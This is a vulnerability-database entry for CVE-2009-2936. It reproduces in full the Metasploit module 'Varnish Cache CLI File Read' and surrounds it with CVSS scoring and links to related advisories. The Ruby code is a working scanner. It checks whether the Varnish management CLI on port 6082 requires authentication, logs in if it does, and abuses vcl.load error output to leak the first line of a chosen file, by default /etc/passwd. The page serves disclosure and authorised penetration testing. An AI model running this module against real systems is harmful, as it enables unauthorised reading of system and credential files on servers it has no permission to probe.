Lucene search
HistoryApr 08, 2017 - 1:15 p.m.
Varnish Cache CLI File Read
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
This module attempts to read the first line of a file by abusing the error message when compiling a file with vcl.load.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/tcp/client'
require 'metasploit/framework/varnish/client'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Metasploit::Framework::Varnish::Client
def initialize
super(
'Name' => 'Varnish Cache CLI File Read',
'Description' => 'This module attempts to read the first line of a file by abusing the error message when
compiling a file with vcl.load.',
'References' =>
[
[ 'OSVDB', '67670' ],
[ 'CVE', '2009-2936' ],
[ 'EDB', '35581' ],
[ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ]
],
'Author' =>
[
'patrick', #original module
'h00die <[email protected]>' #updates and standardizations
],
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 6082
}
)
register_options(
[
OptString.new('PASSWORD', [ false, 'Password for CLI. No auth will be automatically detected', '' ]),
OptString.new('FILE', [ false, 'File to read the first line of', '/etc/passwd' ])
])
end
def run_host(ip)
# first check if we even need auth
begin
connect
challenge = require_auth?
close_session
disconnect
connect
if !challenge
print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: No Authentication Required"
else
if not login(datastore['PASSWORD'])
vprint_error "#{ip}:#{rport} - Unable to Login"
return
end
end
# abuse vcl.load to load a varnish config file and save it to a random variable. This will fail to give us the first line in debug message
sock.get_once
sock.puts("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} #{datastore['FILE']}")
result = sock.get_once
if result && result =~ /Line \d Pos \d+\)\n(.*)/
vprint_good($1)
else
vprint_error(result) # will say something like "Cannot open '/etc/shadow'"
end
close_session
disconnect
rescue Rex::ConnectionError, EOFError, Timeout::Error
print_error "#{ip}:#{rport} - Unable to connect"
end
end
end
Related
fedora
fedora
[SECURITY] Fedora 13 Update: varnish-2.1.0-2.fc13
2010-04-29 07:10:38
securityvulns
securityvulns
Varnish privilege escalation
2010-03-31 00:00:00
Medium security hole in Varnish reverse proxy
2010-03-31 00:00:00
metasploit
metasploit
Varnish Cache CLI Login Utility
2016-11-22 03:06:20
ubuntucve
ubuntucve
CVE-2009-2936
2010-04-05 00:00:00
cvelist
cvelist
CVE-2009-2936
2010-04-05 16:00:00
nvd
nvd
CVE-2009-2936
2010-04-05 16:30:00
attackerkb
attackerkb
CVE-2009-2936
2010-04-05 00:00:00
CVE-2007-2617
2007-05-11 00:00:00
prion
prion
Cross site request forgery (csrf)
2010-04-05 16:30:00
debiancve
debiancve
CVE-2009-2936
2010-04-05 16:30:00
packetstorm
packetstorm
Varnish Cache CLI File Read
2024-08-31 00:00:00
Varnish Cache CLI Login Utility
2024-08-31 00:00:00
Varnish Cache CLI Interface Remote Code Execution
2014-12-20 00:00:00
cve
cve
CVE-2009-2936
2010-04-05 16:30:00
nessus
nessus
Fedora 13 : varnish-2.1.0-2.fc13 (2010-6719)
2010-07-01 00:00:00
zdt
zdt
Varnish Cache CLI Interface Remote Code Execution Exploit
2014-12-21 00:00:00
exploitdb
exploitdb
Varnish Cache CLI Interface - Remote Code Execution (Metasploit)
2014-12-19 00:00:00
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Related for MSF:AUXILIARY-SCANNER-VARNISH-VARNISH_CLI_FILE_READ-